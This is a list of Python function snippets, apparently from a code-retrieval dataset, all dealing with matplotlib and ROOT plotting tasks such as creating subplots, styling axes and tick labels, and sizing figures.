ax.set_ylabel(ylabel)\n ax.plot(sig)", "def __init__(self):\n self.fig = pl.figure(1,figsize=(8,6), dpi=80 , frameon = True , facecolor = '0.75' , edgecolor = 'w')\n self.fig.add_subplot(111 , axisbg = 'w' , projection = 'rectilinear') #if you want to add axes on particular place: fig.add_axes([0.15, 0.1, 0.7, 0.3]) where -> [begin , bottom to start axes , width , height ]\n self.separated = True #if we have a list and need to plot the plots separated", "def plot(self):\n fig, axes = plt.subplots(math.ceil(len(self.plots) / self.col_wrap), self.col_wrap)\n\n for ps, ax in zip(self.plots, axes.flatten()):\n for p in ps:\n if p.x is not None and p.y is not None:\n p.method(x=p.x, y=p.y, *p.args, ax=ax, **p.kwargs)\n else:\n p.method(*p.args, ax=ax, **p.kwargs)\n\n return fig, axes", "def populate_plot_axis(self,plot,ax='x'):\n\n fig=plt.gcf()\n\n extra_ax=[]\n\n if ax=='x':\n\n ticks=plot.get_xticks()\n\n lim=plot.get_xlim()\n\n for i in range(len(self.names)):\n\n if i==0:\n\n axn=plot\n\n axn.spines['bottom'].set_position(('outward',10))\n\n axn.spines['bottom'].set_visible(True)\n\n else:\n\n dy_fig=0.08\n\n prev_ax_position=axn.get_position()\n\n extra_ax.append(fig.add_axes(\\\n (prev_ax_position.x0,\\\n prev_ax_position.y0-2*dy_fig,\\\n prev_ax_position.width,\\\n 0),'autoscalex_on',True))\n\n axn=extra_ax[i-1]\n\n axn.yaxis.set_visible(False)\n\n for side in axn.spines.keys():\n\n axn.spines[side].set_linewidth(1)\n\n axn.set_xticks(ticks)\n\n ticksnames=[float(str(x)) for x in self.values[i]]\n\n axn.set_xticklabels(\\\n [\"{:.2f}\".format(x).rstrip('0').rstrip('.') for x in ticksnames],\\\n rotation = 45)\n\n xlab=axn.set_xlabel(self.names[i])\n\n xlab.set_fontsize(10)\n\n axn.tick_params(axis='x',labelsize=10)\n\n axn.set_xlim(lim)\n\n\n\n elif ax=='y':\n\n ticks=plot.get_yticks()\n\n lim=plot.get_ylim()\n\n for i in range(len(self.names)):\n\n if i==0:\n\n axn=plot\n\n axn.spines['left'].set_position(('outward',10))\n\n axn.spines['left'].set_visible(True)\n\n else:\n\n dx_fig=0.08\n\n plot_position=plot.get_position()\n\n prev_ax_position=axn.get_position()\n\n extra_ax.append(fig.add_axes(\\\n (prev_ax_position.x0-2*dx_fig,\\\n prev_ax_position.y0,\\\n 0,\\\n prev_ax_position.height),'autoscalex_on',True))\n\n axn=extra_ax[i-1]\n\n axn.xaxis.set_visible(False) # hide the yaxis\n\n for side in axn.spines.keys(): # 'top', 'bottom', 'left', 'right'\n\n axn.spines[side].set_linewidth(1)\n\n axn.set_yticks(ticks)\n\n ticksnames=[float(str(x)) for x in self.values[i]]\n\n axn.set_yticklabels(\\\n [\"{:.2f}\".format(x).rstrip('0').rstrip('.') for x in ticksnames],\\\n rotation = 45)\n\n ylab=axn.set_ylabel(self.names[i])\n\n ylab.set_fontsize(10)\n\n axn.tick_params(axis='y',labelsize=10)\n\n axn.set_ylim(lim)\n\n else:\n\n raise ValueError(\"Axis can be 'x' or 'y'\")", "def addAxes(self):\n numDims = len(self.relation.fieldNames) - 1\n angle = 360 / numDims\n axisDomains = self.relation.axisDomains\n for i in range(numDims):\n axis = PlotAxis(self)\n self.scene().addItem(axis)\n if self.axisAngles and i < len(self.axisAngles):\n axis.setRotation(self.axisAngles[i])\n else:\n axis.setRotation(angle * i)\n self.axes.append(axis)\n\n domain = axisDomains[i]\n text = PlotAxisLabel(\"{}\\n[{:.2f},{:.2f}]\".format(self.relation.fieldNames[i], domain[0], domain[1]))\n text.setFont(self.labelFont)\n self.axisLabels.append(text)\n text.setParentItem(axis)", "def createFigure(self,numSubplots,figWidth,figHeight):\r\n#\t\tif self.makeTB:\r\n#\t\t\tself.createToolbar(self.vbox)\r\n#\t\tself.vbox.pack_start(self.myTB,False,False)\r\n\t\tself.axisList=[]\r\n\t\tself.axis=None\r\n\t\t# define handles to widgets\r\n\r\n\t\t############## FIGURE\r\n\t\tself.figure = Figure(dpi=60)\t\t\r\n\t\tself.figure.set_facecolor(figBgColour)\r\n\t\tself.figure.set_edgecolor(figBgColour)\r\n\r\n\t\t#self.axis.set_title('Graph')\r\n\r\n\t\tself.canvas = FigureCanvas(self.figure)\r\n\t\tself.canvas.set_size_request(figWidth,figHeight)\r\n\t\tself.canvas.show()\r\n\t\tself.buttonCallback=self.canvas.mpl_connect('button_press_event', self.OnPress)\r\n#\t\tself.canvas.mpl_connect('resize_event', onAutoScale, None, self.axis, self.canvas)\r\n\r\n \r\n\t\t############## AXIS\r\n\t\t#self.axis=self.figure.add_axes(plotPosition,axisbg=axisColour)\r\n\t\tsubplotList=[]\r\n\t\tfor m in range(numSubplots[0]*numSubplots[1]):\r\n\t\t\tsubplotList.append(numSubplots[0]*100 + numSubplots[1] * 10 + m+1)\r\n\r\n\t\tif len(subplotList)==1:\r\n\t\t\tself.axisList.append(self.figure.add_subplot(111,axisbg=axisColour,polar=self.plotPolar))\r\n\t\t\tself.axisList[0].set_position(PLOT_POSITION)\r\n\t\telse:\r\n\t\t\tfor x in subplotList:\r\n\t\t\t\tself.axisList.append(self.figure.add_subplot(x,axisbg=axisColour))\r\n\r\n\t\tself.axis=self.axisList[0]\r\n\r\n\t\t# format each axis correctly\r\n\t\tfor axis in self.axisList:\r\n\t#\t\tself.axis.grid(True,which='major')\r\n\t\t\taxis.grid(True)\r\n\t#\t\tself.axis.grid(True,which='minor',color='r', linestyle='-', linewidth=2)\r\n\t#\t\tself.axis.set_position(plotPosition)\r\n\r\n\t\t\txax=axis.get_xticklabels()\r\n\t\t\tyax=axis.get_yticklabels()\r\n\r\n\t\t\tfor tick in xax:\r\n\t\t\t\ttick.set_fontsize(axisTextSize)\r\n\r\n\t\t\tfor tick in yax:\r\n\t\t\t\ttick.set_fontsize(axisTextSize)\t\t\r\n\r\n\t\t\r\n\t\tself.legendStr=[]\r\n\t\tself.gaList=[]\r\n\r\n\t\t## add cursor function to axis when mouse is over it\r\n#\t\tself.cursor = Cursor(self.axis, useblit=True, color='red', linewidth=1)\r\n\r\n\t\tself.canvas.draw()\r\n\r\n\t\t# plot a transparent rectangle just on axis 1\r\n\t\tcurrXlim=self.axis.get_xlim()\r\n\t\tdx=abs(currXlim[1]-currXlim[0])\r\n\t\tx0=currXlim[0]\r\n\t\tcurrYlim=self.axis.get_ylim()\r\n\t\tdy=abs(currYlim[1]-currYlim[0])\r\n\t\ty0=currYlim[0]\r\n\r\n\t\tself.axis.r1=plotRect(self.axis,self.canvas,(x0,y0),dx,dy,showRect=self.showRect)\r\n\r\n\t\t#self.axis.cla()\r\n\r\n\t\t\r\n\t\t############## TOOLBAR\r\n\t\t# use a custom version of the matplotlib toolbar\r\n#\t\ttoolbar = NavigationToolbar2(self.canvas, self.win)\r\n\t\tself.toolbar = PlotToolbar(self.canvas,self.win,self.axis)\r\n\t\tzoomtoolbar = PlotZoomToolbar(self.canvas,self.win,self.axis,)\r\n\r\n\t\t# make a TB menu\r\n\t\tmenuList=['|FFT|','Normalised |FFT|','|FFT| & arg(FFT)','|T| & <T','Re & Im (T)','Re & Im (1/T - 1)','n & alpha']\r\n\t\tmnuBtn = MenuToolButtonWidget(menuList, icon=gtk.STOCK_SELECT_COLOR, label='FFT')\r\n\t\tmnuBtn.btn.connect(\"clicked\",self.newFFTwin2,0)\r\n\t\tfor m in range(len(menuList)):\r\n\t\t\tmnuBtn.menuItems[m].connect(\"activate\",self.newFFTwin,m)\r\n\r\n\t\tmnuBtn.btn.set_tooltip_text('Take windowed FFT of ALL lines.')\r\n\t\tself.toolbar.add(mnuBtn.btn)\r\n\r\n\r\n\r\n\t\tsep=gtk.SeparatorToolItem()\r\n\t\tself.toolbar.insert(sep,1)\r\n\r\n\r\n\t\tbtn6=gtk.ToolButton(gtk.STOCK_CLEAR)\r\n\t\tbtn6.connect(\"clicked\",self.OnClear)\r\n\t\tbtn6.set_label('Clear')\r\n\t\tbtn6.set_tooltip_text('Clear the axis.')\r\n\t\tself.toolbar.insert(btn6,1)\r\n\r\n\t\tbtn0=gtk.ToolButton(gtk.STOCK_SAVE_AS)\r\n\t\tbtn0.connect(\"clicked\",self.OnExport)\r\n\t\tbtn0.set_label('Export')\r\n\t\tbtn0.set_tooltip_text('Export data from a curve.')\r\n\t\tself.toolbar.insert(btn0,1)\r\n\r\n\r\n\t\t# make a TB menu\r\n\t\tfitMenuList=['Linear','Polynomial','Exp decay','Subtract exp']\r\n\t\tfitmnuBtn = MenuToolButtonWidget(fitMenuList, icon=gtk.STOCK_ABOUT, label='Fit')\r\n\t\tfitmnuBtn.btn.connect(\"clicked\",self.fitPolynomial,0)\r\n\t\tfor m in range(len(fitMenuList)):\r\n\t\t\tfitmnuBtn.menuItems[m].connect(\"activate\",self.fitPolynomial,m)\r\n\r\n\t\tfitmnuBtn.btn.set_tooltip_text('Fits a polynomial to data (default is a linear fit).')\r\n\t\tself.toolbar.add(fitmnuBtn.btn)\r\n\r\n\r\n\t\tbtn7=gtk.ToolButton(gtk.STOCK_CONVERT)\r\n\t\tbtn7.connect(\"clicked\",self.getBeamWidth)\r\n\t\tbtn7.set_label('Beamwidth')\r\n\t\tbtn7.set_tooltip_text('Get the beamwidth (fits Gaussian to dy/dx).')\r\n\t\tself.toolbar.add(btn7)\r\n\r\n\t\tbtn8=gtk.ToolButton(gtk.STOCK_EDIT)\r\n\t\tbtn8.connect(\"clicked\",self.editPlotParams)\r\n\t\tbtn8.set_label('Axes')\r\n\t\tbtn8.set_tooltip_text('Edit plot parameters.')\r\n\t\tself.toolbar.add(btn8)\r\n\r\n\t\tbtn9=gtk.ToolButton(gtk.STOCK_PROPERTIES)\r\n\t\tbtn9.connect(\"clicked\",self.editLegend)\r\n\t\tbtn9.set_label('Legend')\r\n\t\tbtn9.set_tooltip_text('Edit legend.')\r\n\t\tself.toolbar.add(btn9)\r\n\r\n#\t\tself.toolbar.set_style(gtk.TOOLBAR_BOTH) # make toolbar icons and labels visible\r\n\r\n\t\tif self.makeTB:\r\n\t\t\tself.vbox.pack_start(self.toolbar,False,False)\r\n\r\n\t\tself.vbox.pack_start(self.canvas,True,True)\r\n\t\tself.vbox.pack_start(zoomtoolbar,False,False)\r\n\r\n\t\t####### Line selector/axis alteration toolbar\r\n\t\thbox=gtk.HBox(homogeneous=False, spacing=0)\r\n\r\n\t\tparamNames = ['Line:']\r\n\t\tparamTypes = ['cmb']\r\n\t\tparamDefaultValues = [[]]\r\n\r\n\t\tparamBox = ParamWidget(paramNames,paramTypes,paramDefaultValues)\r\n\t\tself.cmbBox = paramBox.objectList[0]\r\n#\t\tself.cmbBox.connect('changed',self.line_changed)\r\n\r\n\t\tself.hideBtn = gtk.ToggleToolButton(gtk.STOCK_NO)\r\n\t\tself.hideBtn.set_tooltip_text('Hide')\r\n\t\tself.hideBtn.connect('clicked',self.toggle_line)\r\n\t\tparamBox.table.attach(self.hideBtn,0,1,0,1,xoptions=gtk.EXPAND,yoptions=gtk.EXPAND)\r\n\t\t\r\n\t\tself.colourBtn = gtk.ToolButton(gtk.STOCK_COLOR_PICKER)\r\n\t\tself.colourBtn.set_tooltip_text('Colour')\r\n\t\tself.colourBtn.connect('clicked',self.change_colour)\r\n\t\tself.color=gtk.gdk.Color(red=0,green=0,blue=1)\r\n\r\n\t\tparamBox.table.attach(self.colourBtn,1,2,0,1,xoptions=gtk.EXPAND,yoptions=gtk.EXPAND)\r\n\t\t\r\n\t\tself.cmbStyle = gtk.combo_box_new_text()\r\n\r\n\t\tfor style in STYLES:\r\n\t\t\tself.cmbStyle.append_text(style)\r\n\t\tself.cmbStyle.set_active(0)\r\n#\t\tself.style.set_tooltip_text('Line style')\r\n\t\tself.cmbStyle.connect('changed',self.change_style)\r\n\r\n\t\tparamBox.table.attach(self.cmbStyle,2,3,0,1,xoptions=gtk.EXPAND,yoptions=gtk.EXPAND)\r\n\r\n\t\tself.removeBtn = gtk.ToolButton(gtk.STOCK_DELETE)\r\n\t\tself.removeBtn.set_tooltip_text('Remove')\r\n\t\tself.removeBtn.connect('clicked',self.remove_line)\r\n\r\n\t\tparamBox.table.attach(self.removeBtn,3,4,0,1,xoptions=gtk.EXPAND,yoptions=gtk.EXPAND)\r\n\r\n\r\n\t\thbox.pack_start(paramBox.frame,False,False)\r\n\r\n\t\tparamNames = ['Axis:','Left-click sets:']\r\n\t\tparamTypes = ['lbl','cmb']\r\n\t\tparamDefaultValues = ['',['Nothing','Window left','Window right','Axis left','Axis right','Plots point']]\r\n\r\n\t\tparamBox = ParamWidget(paramNames,paramTypes,paramDefaultValues)\r\n\t\thbox.pack_start(paramBox.frame,False,False)\r\n\t\t\r\n\t\tself.cmbBtn = paramBox.objectList[1]\r\n\t\tself.cmbBtn.set_active(0)\r\n\t\tself.cmbBtn.connect(\"changed\", self.onModeChanged)\r\n\r\n\t\thbox.show_all()\r\n\r\n#\t\tself.canvas.mpl_connect('axes_enter_event', self.enter_axes)\r\n#\t\tself.canvas.mpl_connect('axes_leave_event', self.leave_axes)\r\n\r\n\t\tif self.makeTB:\r\n#\t\t\tself.connectToolbar()\r\n\t\t\tself.vbox.pack_start(hbox,False,False)", "def add_figure1(self,x,y,index=1,title='',xlabel='',ylabel=''):\n self.last_index = index\n ax = self.fig.add_subplot(self.position+index)\n ax.set_title(title)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.plot(x,y)", "def etio_subplot(df, ax, title, graph_color='skyblue'):\n\n post_dx_histo = histo_dx_includes(df)\n hist_df = pd.DataFrame({\"Dx\": post_dx_histo.index, \"Count\": post_dx_histo.data})\n #hist_df = hist_df.drop(1)\n print(hist_df)\n\n graph_range = range(1,len(hist_df.index)+1)\n ax.hlines(y=graph_range, xmin=0, xmax=hist_df['Count'], color=graph_color)\n ax.plot(hist_df['Count'], graph_range, \"D\", color=graph_color)\n ax.set_yticks(range(1, len(hist_df['Dx'])+1))\n ax.set_yticklabels(hist_df['Dx'], fontsize='10')\n\n ax.set_title(title, fontsize='10')\n return ax", "def plot_axes_on_fig(ax, fig=None, geometry=(1, 1, 1)):\n if fig is None:\n fig = plt.figure()\n if ax.get_geometry() != geometry:\n ax.change_geometry(*geometry)\n axes = fig.axes.append(ax)\n return fig, axes", "def subplot_to_figure(self):\n if self.format is \"show\":\n plt.show()\n elif self.format is \"png\":\n plt.savefig(self.path + self.filename + \".png\", bbox_inches=\"tight\")", "def set_axes(self, a):\r\n self.axes = a", "def create_figure(self) -> None:\n plt.ion()\n self.fig = plt.figure(1)\n self.axis = self.fig.add_subplot(111, xlim=(0, 1), ylim=(0, 1))\n self.axis.grid(True)\n plt.xticks(np.linspace(0, 1, self._param[\"n_v\"] + 1))\n plt.yticks(np.linspace(0, 1, self._param[\"n_v\"] + 1))\n a_plt, = self.axis.plot([], [], 'bx', markersize=5)\n l_plt, = self.axis.plot([], [], 'r.', markersize=15)\n self.plots = [a_plt, l_plt]", "def __init__(self, subplot_objects):\n self.subplot_objects = subplot_objects", "def add_subplots(fig, els_counted, atts_counted, chart_info, name=\"\", log=False):\n if name != \"\":\n if is_filename(name):\n # overview of element/attribute usage for a single text\n draw_chart(els_counted, fig, chart_info[\"elements_used_text\"], log)\n draw_chart(atts_counted, fig, chart_info[\"attributes_used_text\"], log)\n elif is_attname(name):\n # overview for a specific attribute\n draw_chart(atts_counted, fig, chart_info[\"attribute_used\"], log)\n else:\n # overview for a specific element\n draw_chart(els_counted, fig, chart_info[\"element_used\"], log)\n else:\n # overall overview of element and attribute usage\n draw_chart(els_counted, fig, chart_info[\"elements_used_all\"], log)\n draw_chart(atts_counted, fig, chart_info[\"attributes_used_all\"], log)", "def ex_subplot(self, X, Y, vert = True, ttls='', argls='', **kwargs):\n go_with_x()\n ax = gca()\n\n num_subplots = len(Y)\n\n if not len(Y) > 1:\n raise Exception, \"Subplot requires at least two Y arguments\"\n\n for i in range(len(Y)):\n argl = ''\n ttl = ''\n\n # parse out list of arguments and titles\n if len(argls) == len(Y):\n argl = argls[i]\n if len(ttls) == len(Y):\n ttl = ttls[i]\n\n # based on vert setting, determine subplot command\n if vert == True:\n sub_num = int('%d%d%d' % (num_subplots, 1, i+1))\n else:\n sub_num = int('%d%d%d' % (1, num_subplots, i+1))\n\n subplot(sub_num)\n\n # If passed a list of indices, pass to twinplot function\n if hasattr(Y[i], '__iter__'):\n self.ex_twinplot(X, Y[i], ttl=ttl, argl=argl, **kwargs)\n else:\n self.ex_plot(X, Y[i], ttl=ttl, argl=argl, **kwargs)\n\n ax = gca()\n\n # Remove redundant axes on subplot\n if vert == True:\n if i+1 != len(Y):\n ax.set_xlabel('')\n else:\n if i != 0:\n ax.set_ylabel('')", "def execute(self, fig):\n info = self._params\n renderer = fig._get_renderer()\n with getattr(renderer, \"_draw_disabled\", nullcontext)():\n kwargs = get_tight_layout_figure(\n fig, fig.axes, get_subplotspec_list(fig.axes), renderer,\n pad=info['pad'], h_pad=info['h_pad'], w_pad=info['w_pad'],\n rect=info['rect'])\n if kwargs:\n fig.subplots_adjust(**kwargs)", "def __init__(self, subplot_class, *args, **kwargs):\n import pylab\n self.fig = pylab.figure(*args, **kwargs)\n self.subplot_class = subplot_class", "def _make_twin_axes(self, *args, **kwargs):\n # Typically, SubplotBase._make_twin_axes is called instead of this.\n # There is also an override in axes_grid1/axes_divider.py.\n if 'sharex' in kwargs and 'sharey' in kwargs:\n raise ValueError('Twinned Axes may share only one axis.')\n ax2 = self.figure.add_axes(self.get_position(True), *args, **kwargs)\n self.set_adjustable('datalim')\n ax2.set_adjustable('datalim')\n self._twinned_axes.join(self, ax2)\n return ax2", "def plot_subplots_vel(self, fig_num: int, title: str, y_label: str, vel: np.ndarray) -> matplotlib.figure.Figure:\n fig = plt.figure(fig_num)\n axs = fig.subplots(3, 1, sharex=True)\n marker_graph_init(axs, vel, y_label, self.frame_nums, color='blue')\n plt.tight_layout()\n fig.suptitle(title)\n make_interactive()\n return fig", "def adjust_axes(axes):\n # TODO: Uncomment & decide for each subplot!\n for ax in axes.itervalues():\n core.hide_axis(ax)\n\n for k in [\n \"placeholder\",\n \"placeholder1\",\n \"placeholder2\",\n \"spikes_stim\",\n \"spikes_stim1\",\n \"spikes_stim2\",\n \"spikes_post\",\n \"stimulation_schema\"\n ]:\n axes[k].set_frame_on(False)", "def bind_to_figure(ax, fig=None):\n\n if fig is not None:\n assert isinstance(fig, plt.Figure), 'argument must be a Figure'\n assert len(fig.axes) == 1, 'figure must have one and only one axes'\n new_ax = fig.axes[0]\n else:\n fig, new_ax = plt.subplots()\n\n new_ax.set_facecolor(ax.get_facecolor())\n\n for line in ax.lines:\n data = line.get_data()\n new_ax.plot(data[0], data[1], linestyle=line.get_linestyle(), color=line.get_color(),\n zorder=line.zorder, label=line.get_label())\n\n for collection in ax.collections:\n data = collection.get_offsets()\n new_ax.scatter(data[:, 0], data[:, 1], marker='s', facecolor=collection.get_facecolors(),\n edgecolor=collection.get_edgecolors(), s=collection.get_sizes(),\n zorder=line.zorder, label=collection.get_label())\n\n for text in ax.texts:\n xx, yy = text.get_position()\n new_ax.text(xx, yy, text.get_text(), family=text.get_fontfamily(),\n fontsize=text.get_fontsize(),\n color=text.get_color(), ha=text.get_horizontalalignment(),\n va=text.get_verticalalignment(), zorder=text.zorder)\n\n for image in ax.images:\n new_ax.imshow(image.get_array(), interpolation=image.get_interpolation())\n\n if ax.legend_:\n new_ax.legend()\n\n new_ax.grid(ax.get_xgridlines(), color=ax.get_xgridlines()[0].get_color(),\n alpha=ax.get_xgridlines()[0].get_alpha())\n new_ax.grid(ax.get_ygridlines(), color=ax.get_xgridlines()[0].get_color(),\n alpha=ax.get_xgridlines()[0].get_alpha())\n\n new_ax.set_xlim(ax.get_xlim())\n new_ax.set_ylim(ax.get_ylim())\n new_ax.set_xlabel(ax.get_xlabel())\n new_ax.set_ylabel(ax.get_ylabel())\n\n return fig", "def _add_axes(self, n):\n height = (self.top - self.bottom) / float(self.get_n())\n height = min(height, self.maxheight)\n width = self.right - self.left\n ax = self.figure.add_axes([self.left, self.bottom + (n - 1) * height, width, height])\n return ax", "def axes_maker(rows, cols):\n fig = plt.figure()\n current_subplot = [1] # Use list in order to modify\n def next_axes(**kwargs):\n current_subplot[0] += 1\n axes = fig.add_subplot(rows, cols, current_subplot[0] - 1, **kwargs)\n return axes\n return next_axes", "def frame():\n fig = plt.figure(figsize = (6, 3))\n\n plt.subplots_adjust(left=.15, bottom=.2, right=.95, top=.9)\n ax = fig.add_subplot(111)\n \n ax.tick_params(axis=\"x\", labelsize=12)\n ax.tick_params(axis=\"y\", labelsize=12)\n\n return fig, ax", "def add_subplot(self, plot, i=0, j=0, plot_id=None):\n self.plotlayout.addWidget(plot, i, j)\n self.plots.append(plot)\n if plot_id is None:\n plot_id = id(plot)\n self.manager.add_plot(plot, plot_id)", "def _set_axes(self):\n self += helper.line(stroke=\"black\", x1=self.__dict__['x'], x2=self.__dict__['x'], y1=0, y2=self.__dict__['y']*2)\n self += helper.line(stroke=\"black\", x1=0, x2=self.__dict__['x']*2, y1=self.__dict__['y'], y2=self.__dict__['y'])", "def plot_subplots(self, fig_num: int, title: str, raw: np.ndarray, smoothed: np.ndarray,\n axes_lbl_entries: Sequence[str]) -> matplotlib.figure.Figure:\n fig = plt.figure(fig_num)\n axs = fig.subplots(3, 1, sharex=True)\n raw_lines = marker_graph_init(axs, raw, '', self.frame_nums, color='red')\n for idx, ax in enumerate(axs):\n plot_utils.update_ylabel(ax, axes_lbl_entries[idx], font_size=10)\n smoothed_lines = marker_graph_add(axs, smoothed, self.frame_nums, color='green')\n plt.tight_layout()\n plt.subplots_adjust(top=0.94)\n fig.suptitle(title)\n fig.legend((raw_lines[0], smoothed_lines[0]), ('Raw', 'Smoothed'), ncol=2, handlelength=0.75,\n handletextpad=0.25, columnspacing=0.5, loc='lower left')\n make_interactive()\n return fig", "def prepare_subplot(fig, point_list, cols, rows, number, lims):\n ax = fig.add_subplot(cols, rows, number)\n ax.scatter(list(map(lambda e: e[0], point_list)), list(map(lambda e: e[1], point_list)), s=9)\n ax.set_xlim(lims[0], lims[1])\n ax.set_ylim(lims[0], lims[1])\n return ax", "def adjust_figsize(self):\n extra_width = 0\n extra_height = 0\n if 'suptitle' in self.figure_objects:\n suptitle_obj = self.figure_objects['suptitle']\n suptitle_height = self.get_bbox(suptitle_obj).height\n extra_height += suptitle_height\n\n ax_widths = []\n ax_heights = []\n for subplot in self.subplots:\n ax = subplot.ax\n annotations = subplot.annotations\n\n width = 0\n height = 0\n if annotations is not None:\n ax_bbox = self.get_bbox(ax)\n\n if 'title' in annotations:\n title_obj = annotations['title']\n title_height = self.get_bbox(title_obj).height\n height += title_height\n\n xticks_objects = ax.get_xticklabels()\n first_xtick_bbox = self.get_bbox(xticks_objects[0]) # first lower xticklabel bbox\n lower_xticks_height = max(0, ax_bbox.y0 - first_xtick_bbox.y0)\n height += lower_xticks_height\n\n last_xtick_bbox = self.get_bbox(xticks_objects[-1])\n # if last xticklabel bbox is heigher that the first, there are labels atop of the subplot\n if first_xtick_bbox.y0 != last_xtick_bbox.y0:\n upper_xticks_height = max(0, last_xtick_bbox.y1 - ax_bbox.y1)\n height += upper_xticks_height\n\n if 'xlabel' in annotations:\n xlabel_obj = annotations['xlabel']\n xlabel_height = self.get_bbox(xlabel_obj).height\n height += xlabel_height\n\n yticks_objects = ax.get_yticklabels()\n if len(yticks_objects) > 0:\n first_ytick_bbox = self.get_bbox(yticks_objects[0]) # first lower xticklabel bbox\n lower_yticks_width = max(0, ax_bbox.x0 - first_ytick_bbox.x0)\n width += lower_yticks_width\n\n if len(yticks_objects) > 1:\n last_ytick_bbox = self.get_bbox(yticks_objects[-1])\n # if last yticklabel bbox is righter that the first, there are labels to the right of the subplot\n if first_ytick_bbox.x0 != last_ytick_bbox.x0:\n right_yticks_width = max(0, last_ytick_bbox.x1 - ax_bbox.x1)\n width += right_yticks_width\n\n if 'ylabel' in annotations:\n ylabel_obj = annotations['ylabel']\n ylabel_width = self.get_bbox(ylabel_obj).width\n width += ylabel_width\n\n ax_widths.append(width)\n ax_heights.append(height)\n\n nrows, ncols = self.figure_config['ncols'], self.figure_config['nrows']\n ax_widths = np.array(ax_widths).reshape(nrows, ncols)\n extra_width += ax_widths.max(axis=1).sum()\n\n ax_heights = np.array(ax_heights).reshape(nrows, ncols)\n extra_height += ax_heights.max(axis=0).sum()\n\n fig_width, fig_height = self.figure_config['figsize']\n new_figsize = (fig_width + extra_width, fig_height + extra_height)\n self.figure.set_size_inches(new_figsize)", "def _handle_axes(self, drawable, option):\n # If we already have an axes object, ignore this one\n if self._axes_object is not None:\n return\n\n # Grab the histogram used for axes style/range manipulation\n if is_stack(drawable) or is_graph(drawable):\n axes_histogram = drawable.GetHistogram()\n else:\n axes_histogram = drawable\n\n # Grab the histogram used for title manipulation\n if is_stack(drawable):\n title_histogram = drawable.GetHists()[0]\n else:\n title_histogram = drawable\n\n # Set the plot title\n title_histogram.SetTitle(self._title)\n\n # Grab axes\n x_axis, y_axis = axes_histogram.GetXaxis(), axes_histogram.GetYaxis()\n\n # Grab titles from first histogram if not set explicitly\n if self._x_title is None:\n self._x_title = title_histogram.GetXaxis().GetTitle()\n if self._y_title is None:\n self._y_title = title_histogram.GetYaxis().GetTitle()\n\n # Style x-axis, or hide it if this plot has a ratio plot\n if self._x_range is not None:\n x_axis.SetRangeUser(*self._x_range)\n if self._ratio_plot:\n x_axis.SetLabelOffset(999)\n x_axis.SetTitleOffset(999)\n else:\n x_axis.SetTitle(self._x_title)\n x_axis.SetTitleSize(self.PLOT_X_AXIS_TITLE_SIZE)\n x_axis.SetTitleOffset(self.PLOT_X_AXIS_TITLE_OFFSET)\n x_axis.SetLabelSize(self.PLOT_X_AXIS_LABEL_SIZE)\n if self._x_integer_ticks:\n x_axis.SetNdivisions(11) # hack for integer ticks \n\n # Style y-axis\n y_axis.SetTitle(self._y_title)\n y_axis.SetLabelFont(self.PLOT_ATLAS_STAMP_TEXT_FONT)\n y_axis.SetTitleSize(\n (self.PLOT_Y_AXIS_TITLE_SIZE_WITH_RATIO\n if self._ratio_plot\n else self.PLOT_Y_AXIS_TITLE_SIZE)\n )\n y_axis.SetTitleOffset(\n (self.PLOT_Y_AXIS_TITLE_OFSET_WITH_RATIO\n if self._ratio_plot\n else self.PLOT_Y_AXIS_TITLE_OFFSET)\n )\n y_axis.SetNdivisions(5,5,0)\n \n # set axis text sizes \n if self._ratio_plot:\n y_axis.SetLabelSize(self.PLOT_Y_AXIS_LABEL_SIZE_WITH_RATIO)\n else:\n y_axis.SetLabelSize(self.PLOT_Y_AXIS_LABEL_SIZE) \n y_axis.SetTitleSize(self.PLOT_Y_AXIS_TITLE_SIZE)\n y_axis.SetTitleOffset(self.PLOT_RATIO_Y_AXIS_TITLE_OFFSET)\n\n # Redraw the drawable with the new style\n drawable.Draw(option)", "def subplots(nrows=1, ncols=1, sharex=False, sharey=False, squeeze=True, apportion = None, debug = 0, *args, **kwargs):\n #Note: we use squeeze = False internally, then return axes according to the keyword\n fig, axes = pylab_subplots(nrows=nrows, ncols=ncols, sharex=sharex, sharey=sharey, squeeze=False, *args, **kwargs)\n nrows = len(axes[:,0].flatten())\n # start with even allocation of unity\n fracts = np.ones(nrows)\n # if just one arg, that is the first allocation\n if apportion != None:\n if len(np.shape(apportion)) == 0:\n fracts[0]=apportion\n # fill up the rest\n for (i,a) in enumerate(apportion):\n if i<nrows: fracts[i] = a\n # now make into a fractions\n fracts = fracts/np.sum(fracts)\n\n #loop over axes, bottom to top, extract the space below and the height for each (ignore space above\n above = [] ; height = []\n lasty = 1\n for (i,ax) in enumerate(axes[:,0]):\n bb = ax.get_position().get_points()\n pos = bb.flatten() \n height.append(pos[3]-pos[1])\n above.append(lasty - pos[3] )\n lasty = pos[1]\n\n# loop again, building down from top according to new share, keep margins\n yabove_0 = 1 # the norm. y coord of the bottom of the above graph\n print(above, height)\n for col in range(np.shape(axes)[1]):\n for (i,ax) in enumerate(axes[:,col]):\n if (i==0): yabove = yabove_0\n bb = ax.get_position().get_points()\n pos = bb.flatten() \n # convert to x0,y0, dx, dy form by subtracting origin\n newh = height[i]*fracts[i]*nrows\n\n pos[1] = yabove - newh - above[i]\n pos[3] = newh\n pos[2] = pos[2] - pos[0]\n yabove = pos[1]\n if debug>0: print(pos)\n ax.set_position(pos)\n\n if squeeze: \n if len(np.shape(axes[0]))==0: axes = axes.flatten() \n if len(axes) == 1: axes = axes[0]\n return(fig, axes)", "def new_axes(self, name):\n\n return self.figure.add_axes([0.05, 0.05, 0.9, 0.9], label=name)", "def func_double_yaxis_data_subplot_show(data_plot_cfg_dic_nlst, axes_cfg_dic_lst,\n nrow, ncol, x_label, y1_label, y2_label,\n sub_titles=None, anno_text_lst=None, fig_title_lst=None,\n fig_size=None, subplot_fit_rect=None):\n\n # Create a figure\n fig, axs = plt.subplots(nrow, ncol, figsize=fig_size)\n\n # Plot the double-axis data for each subplot\n for index, ax in enumerate(axs.flat):\n ax1, ax2 = func_double_yaxis_data_plot(ax, data_plot_cfg_dic_nlst[index], axes_cfg_dic_lst,\n x_label, y1_label, y2_label)\n\n # Config the figure\n if index == 0:\n fontsize_label = axes_cfg_dic_lst[0].get('fontsize_label', 14)\n ax1.set_ylabel(y1_label, color='k', fontsize=fontsize_label)\n ax2.label_outer() # It seems label_outer() doesn't work for ax2, so I remove ytick labels manually\n ax2.set_yticklabels([])\n elif index == (ncol - 1):\n fontsize_label = axes_cfg_dic_lst[1].get('fontsize_label', 14)\n ax2.set_ylabel(y2_label, color='k', fontsize=fontsize_label)\n ax1.label_outer()\n\n 